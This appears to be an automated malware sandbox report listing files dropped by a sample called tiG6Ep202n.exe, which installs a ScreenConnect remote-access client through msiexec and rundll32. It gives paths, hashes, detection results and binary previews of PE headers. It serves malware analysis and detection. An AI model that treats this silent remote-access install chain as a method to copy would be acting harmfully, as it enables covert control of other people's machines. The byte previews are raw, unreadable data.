                                                                                                            Preview:........................................;...{.......|9. ....|.......... ....|3. ....|....L. ....|...................q.. ....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):746
                                                                                                            Entropy (8bit):5.349174276064173
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                                                            MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                                            SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                                            SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                                            SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tiG6Ep202n.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\tiG6Ep202n.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):321
                                                                                                            Entropy (8bit):5.36509199858051
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                                            MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                                            SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                                            SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                                            SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                                            Malicious:true
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                                            C:\Users\user\AppData\Local\Temp\MSI9606.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1088392
                                                                                                            Entropy (8bit):7.789940577622617
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:QUUGGHn+rUGemcPe9MpKL4Plb2sZWV+tLv0QYu5OPthT+gd:jGHpRPqMpvlqs0O4iO2k
                                                                                                            MD5:8A8767F589EA2F2C7496B63D8CCC2552
                                                                                                            SHA1:CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
                                                                                                            SHA-256:0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
                                                                                                            SHA-512:518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\CustomAction.config

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):234
                                                                                                            Entropy (8bit):4.977464602412109
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                                            MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                                            SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                                            SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                                            SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                                            Malicious:false
                                                                                                            Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>

                                                                                                            C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.Cab.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):4.62694170304723
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                                            MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                                            SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                                            SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                                            SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):36864
                                                                                                            Entropy (8bit):4.340550904466943
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                                            MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                                            SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                                            SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                                            SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):57344
                                                                                                            Entropy (8bit):4.657268358041957
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                                            MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                                            SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                                            SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                                            SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):176128
                                                                                                            Entropy (8bit):5.775360792482692
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                                            MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                                            SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                                            SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                                            SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Core.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):548864
                                                                                                            Entropy (8bit):6.034211651049746
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                                            MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                                            SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                            SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                            SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                            C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.InstallerActions.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):11776
                                                                                                            Entropy (8bit):5.273875899788767
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:V8/Qp6lCJuV3jHXtyVNamVNG1YZfCrMmbfHJ7kjvLjbuLd9NEFbM64:y/cBJaLXt2NaheUrMmb/FkjvLjbuZj64
                                                                                                            MD5:73A24164D8408254B77F3A2C57A22AB4
                                                                                                            SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
                                                                                                            SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
                                                                                                            SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........E... ...`....... ..............................D9....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o

                                                                                                            C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Windows.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1721856
                                                                                                            Entropy (8bit):6.639085961200334
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                            MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                            SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                            SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                            SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                            C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\tiG6Ep202n.exe
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8241152
                                                                                                            Entropy (8bit):7.950608858875448
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:98304:YwJ4t1h0cG5FGJRPxow8O5wJ4t1h0cG5hwJ4t1h0cG5UwJ4t1h0cG5:BWh0cGw8Wh0cGkWh0cGzWh0cG
                                                                                                            MD5:51DEB91FCA18628A252D5AB03AB83E7E
                                                                                                            SHA1:B75C70DD39437244FA4BF041D86ABB7F1DEB1363
                                                                                                            SHA-256:2002891CC778EE75D0F6EEA844EB45199F867B82BE7D69EA9625FC9FDC3F6E36
                                                                                                            SHA-512:0F6DBBFAF93E516DB970A9A4DF1F36BA564761AE0BB714FEA1B8735628A4DF566E14A5CE98F1A073B5BB84B04C747A4946FF7E3E5B48E94A1CBCC02A34E96987
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Installer\6699fd.msi

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8241152
                                                                                                            Entropy (8bit):7.950608858875448
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:98304:YwJ4t1h0cG5FGJRPxow8O5wJ4t1h0cG5hwJ4t1h0cG5UwJ4t1h0cG5:BWh0cGw8Wh0cGkWh0cGzWh0cG
                                                                                                            MD5:51DEB91FCA18628A252D5AB03AB83E7E
                                                                                                            SHA1:B75C70DD39437244FA4BF041D86ABB7F1DEB1363
                                                                                                            SHA-256:2002891CC778EE75D0F6EEA844EB45199F867B82BE7D69EA9625FC9FDC3F6E36
                                                                                                            SHA-512:0F6DBBFAF93E516DB970A9A4DF1F36BA564761AE0BB714FEA1B8735628A4DF566E14A5CE98F1A073B5BB84B04C747A4946FF7E3E5B48E94A1CBCC02A34E96987
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Installer\6699ff.msi

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8241152
                                                                                                            Entropy (8bit):7.950608858875448
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:98304:YwJ4t1h0cG5FGJRPxow8O5wJ4t1h0cG5hwJ4t1h0cG5UwJ4t1h0cG5:BWh0cGw8Wh0cGkWh0cGzWh0cG
                                                                                                            MD5:51DEB91FCA18628A252D5AB03AB83E7E
                                                                                                            SHA1:B75C70DD39437244FA4BF041D86ABB7F1DEB1363
                                                                                                            SHA-256:2002891CC778EE75D0F6EEA844EB45199F867B82BE7D69EA9625FC9FDC3F6E36
                                                                                                            SHA-512:0F6DBBFAF93E516DB970A9A4DF1F36BA564761AE0BB714FEA1B8735628A4DF566E14A5CE98F1A073B5BB84B04C747A4946FF7E3E5B48E94A1CBCC02A34E96987
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Installer\MSI9C5F.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):423504
                                                                                                            Entropy (8bit):6.57768068531417
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:VuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvv:VuH2anwohwQUv5uH2anwohwQUvv
                                                                                                            MD5:DC3E09FD229DD1B8F03341A8E592493F
                                                                                                            SHA1:74FE7D90F3A7A26B14A317F3FCC50E9F400F6479
                                                                                                            SHA-256:59FA28BD313C8E7E307A0AE05CA89764EABFBC5183B401CEE6F0127566C13C65
                                                                                                            SHA-512:611A67C211FBF718C05E7F7CB026900D9E7CFF609410502ED9DBA429602819C8E9D5202A768E1010F72599324563297B3B07C8107593AEEAF79F12ADA2B4C3CC
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI9C5F.tmp, Author: Joe Security
                                                                                                            Preview:...@IXOS.@.....@.R.Y.@.....@.....@.....@.....@.....@......&.{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}'.ScreenConnect Client (a532d472f1ff1d4e)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (a532d472f1ff1d4e)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{CF9AE42D-A542-A5BE-DF54-2B1FF488B5E3}^.C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{9509AE8A-E997-4132-8CAB-BAFE89DF77F6}f.C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{8B377FBF-DB9A-CC34-86C5-7376F38045E2}c.C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileMa

                                                                                                            C:\Windows\Installer\MSI9C7F.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):207360
                                                                                                            Entropy (8bit):6.573348437503042
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                            MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                            SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                            SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                            SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Installer\MSIA097.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):207360
                                                                                                            Entropy (8bit):6.573348437503042
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                            MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                            SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                            SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                            SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Installer\SourceHash{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.1722278675808895
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:JSbX72Fj+AGiLIlHVRpIh/7777777777777777777777777vDHFUfK2Yw7rl0i8Q:JsQI5wGK2YbF
                                                                                                            MD5:BB8B7321B1787458E306724216A29918
                                                                                                            SHA1:FFBF328FD36CC446D91CBFF8316CB0F31DBDA963
                                                                                                            SHA-256:EEC4E0520B3FA370106F2811A16247D6572E632BE7F9F3C285802ACEF0B369A2
                                                                                                            SHA-512:1E8BE15DFE2A174B66288AFA780BE26CA85B8A453432B1613EDB86BCC0635823309BDB3416FC979C6B5E191EEBA6ACC675248388781938919E0CB94099CC4D15
